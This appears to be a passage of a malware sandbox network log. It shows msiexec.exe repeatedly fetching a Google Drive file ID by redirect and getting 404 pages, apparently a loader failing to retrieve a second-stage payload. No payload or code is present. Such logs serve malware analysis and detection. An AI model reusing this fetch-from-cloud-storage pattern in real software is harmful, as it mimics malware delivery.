2025-01-11 03:27:29 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 54 2d 57 57 70 6c 41 6e 46 54 57 76 4c 39 47 31 79 4d 30 64 37 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="T-WWplAnFTWvL9G1yM0d7A">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.11	50007	142.250.184.238	443	7536	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 03:27:30 UTC	417	OUT	GET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
2025-01-11 03:27:30 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 03:27:30 GMT Location: https://drive.usercontent.google.com/download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download Strict-Transport-Security: max-age=31536000 Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-XsWOxnN8iUR00aENFATMJA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.11	50008	142.250.185.161	443	7536	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 03:27:31 UTC	459	OUT	GET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
2025-01-11 03:27:31 UTC	1851	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFIdbgTAAc0OKIIuUvGcNeUOOXq_H5G-nN3--xhr9X5jciEjk73LrWR1tkjaSQT84uUjeS6JGWTFrzY Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 03:27:31 GMT Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-OVH4PVNzRNZK_kIP8Of2Ow' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2025-01-11 03:27:31 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 30 79 74 4f 4a 48 55 6d 59 47 44 45 39 5a 4e 42 65 63 43 6c 62 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="0ytOJHUmYGDE9ZNBecClbQ">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.11	50009	142.250.184.238	443	7536	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 03:27:32 UTC	417	OUT	GET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
2025-01-11 03:27:33 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 03:27:33 GMT Location: https://drive.usercontent.google.com/download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-UOOhRR-wLgOFz-BNnaEP1A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.11	50010	142.250.185.161	443	7536	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 03:27:33 UTC	459	OUT	GET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
2025-01-11 03:27:34 UTC	1844	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFIdbgQ4J6luVjsf5UzUvt8nNSgTiGcsZEJgh9QrG8nL_8qY6sf4c6TDd8505iH1izWjYZaP Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 03:27:34 GMT Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-_5SKqCsWboxf1JsByqZpWw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2025-01-11 03:27:34 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 70 30 38 39 30 34 75 5a 52 4c 4c 58 42 6d 58 37 7a 38 47 30 43 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="p08904uZRLLXBmX7z8G0CQ">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.11	50011	142.250.184.238	443	7536	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 03:27:35 UTC	417	OUT	GET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
2025-01-11 03:27:35 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 03:27:35 GMT Location: https://drive.usercontent.google.com/download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-BKRA830OWcsn1sl_HFI3Qg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Cross-Origin-Opener-Policy: same-origin Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.11	50012	142.250.185.161	443	7536	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 03:27:36 UTC	459	OUT	GET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
2025-01-11 03:27:36 UTC	1844	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFIdbgTI9oAh2-K8x_9ZFSSjwelb9vLB_aBikr6pTfHlaYLl5Wk8nxOJYzyj3e9oBxFYvyZt Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 03:27:36 GMT Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: script-src 'nonce-VTYqubCigAwQRc3YhHj23A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2025-01-11 03:27:36 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6e 76 4b 72 69 30 6e 34 6c 64 65 57 62 39 31 49 43 4a 38 38 70 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="nvKri0n4ldeWb91ICJ88pQ">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.11	50013	142.250.184.238	443	7536	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 03:27:37 UTC	417	OUT	GET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
2025-01-11 03:27:37 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 03:27:37 GMT Location: https://drive.usercontent.google.com/download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-Z5SsEP_lTV1TMuepER0NOg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Cross-Origin-Opener-Policy: same-origin Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.11	50014	142.250.185.161	443	7536	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 03:27:38 UTC	459	OUT	GET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
2025-01-11 03:27:39 UTC	1851	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFIdbgRTuIO6slElX1NK4eSrKYJwXkc217yz3tKuRL6iy8cBHIgVI1i3MqXRv16MRbcbzvtTTybNcn4 Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 03:27:38 GMT Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: script-src 'nonce-541YQCZUsFL27x04-D9NZg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
